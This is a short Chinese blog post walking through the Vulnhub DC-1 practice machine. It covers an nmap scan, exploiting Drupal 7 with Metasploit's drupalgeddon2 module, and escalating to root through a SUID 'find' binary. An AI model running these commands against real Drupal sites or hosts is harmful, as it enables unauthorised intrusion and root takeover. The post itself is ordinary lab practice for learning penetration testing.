Vulnhub:DC-1靶机

kali:192.168.111.111

靶机:192.168.111.248

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.248

image

访问80端口发现CMS为drupal 7

image

image

搜索发现该版本的drupal存在漏洞

searchsploit drupal

image

漏洞利用

使用msf的exploit/unix/webapp/drupal_drupalgeddon2模块进行漏洞利用

use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.111.248
run

image

提权

查找suid权限的文件

find / -perm -u=s 2> /dev/null

image

提权方法:https://gtfobins.github.io/gtfobins/find/#suid

image

提升为root

find . -exec /bin/bash -p \; -quit

image

flag

image

posted @   ctostm  阅读(17)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· Docker 太简单,K8s 太复杂?w7panel 让容器管理更轻松!
点击右上角即可分享
微信分享提示